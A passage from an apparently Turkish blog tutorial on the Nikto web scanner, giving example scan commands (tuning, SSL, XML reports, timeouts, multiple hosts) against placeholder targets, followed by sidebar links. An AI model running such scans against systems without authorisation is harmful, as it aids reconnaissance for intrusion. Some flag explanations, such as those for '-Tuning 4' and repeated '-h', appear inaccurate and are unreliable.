Nikto ile hedef üzerinde karmaşık ve ayrıntılı testler gerçekleştirebilirsiniz. Örneğin:

bashKopyalaDüzenlenikto -h https://example.com -p 8080 -Tuning 4 -o report.xml -ssl

Bu komut, HTTPS sunucusunu 8080 portunda SSL test ederek, raporu XML formatında çıkarır.

b) Zamanlama Parametreleri

Web sunucusunun yanıt süresi ve yoğun trafiği analiz etmek için Nikto’yu zamanlama ile çalıştırabilirsiniz:

bashKopyalaDüzenlenikto -h http://example.com -timeout 15

Bu, her isteğin 15 saniye içinde tamamlanmasını sağlar.

c) Çift Tarama (Parallel Tarama)

Aynı anda birden fazla hedefi taramak için Nikto’yu paralel olarak çalıştırabilirsiniz:

bashKopyalaDüzenlenikto -h http://target1.com -h http://target2.com

Sonuç ve Değerlendirme

Nikto, web güvenliği konusunda kapsamlı bir test aracıdır ve sızma testi yapan güvenlik uzmanlarının sıklıkla kullandığı bir araçtır. Web sunucularını tararken, güvenlik açıklarını ve zayıf noktaları hızlıca tespit etmenize yardımcı olabilir. Yukarıdaki komutlarla Nikto’nun birçok özelliğini ve tarama seçeneğini etkin bir şekilde kullanabilirsiniz.

  • Gönderiler/Makaleler/Tezler

    Yapay Zeka Destekli Konteyner Kontrolü:

    UNODC CCP Modelinin Geliştirilmesinde Makine Öğrenmesi Yaklaşımlarının Rolü ÖzetKüresel ticaretin %90’ından fazlası denizyolu ile gerçekleştirilmektedir. Bu büyük hacimli tücaret trafiği, suç örgütleri tarafından yasa dışı malların (uyuşturucu, silah, sahte ürünler,…

    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    Özet Uluslararası ticaretin önemli bir bölümünün konteyner taşımacılığıyla yürütülmesi, limanlar ve sınır kapılarını yasa dışı ticaret faaliyetleri açısından kritik noktalar haline getirmiştir. Bu bağlamda, Birleşmiş Milletler Uyuşturucu ve Suç Ofisi…

    Bir yanıt yazın

    E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

    Neler Kaçırdın?

    Yapay Zeka Destekli Konteyner Kontrolü:

    • By admin
    • Nisan 17, 2025
    • 13 views
    Yapay Zeka Destekli Konteyner Kontrolü:

    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    • By admin
    • Nisan 17, 2025
    • 13 views
    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    Uyuşturucu ve Silah Kaçakçılığı: Uluslararası Güvenlik Açısından Küresel Bir Tehdit

    • By admin
    • Nisan 17, 2025
    • 19 views
    Uyuşturucu ve Silah Kaçakçılığı: Uluslararası Güvenlik Açısından Küresel Bir Tehdit

    Trump: Amerika’nın Çöküşünü mü Tetikleyecek, Yoksa Onu Tekrar İstikrarlı Bir Güce mi Dönüştürecek?

    • By admin
    • Nisan 17, 2025
    • 24 views
    Trump: Amerika’nın Çöküşünü mü Tetikleyecek, Yoksa Onu Tekrar İstikrarlı Bir Güce mi Dönüştürecek?

    ÇİN / TAYVAN SORUNU

    • By admin
    • Nisan 17, 2025
    • 30 views
    ÇİN / TAYVAN SORUNU

    AMD Instinct MI300X: Yapay Zekâ ve HPC için Yeni Nesil Hızlandırıcı

    • By admin
    • Nisan 9, 2025
    • 72 views
    AMD Instinct MI300X: Yapay Zekâ ve HPC için Yeni Nesil Hızlandırıcı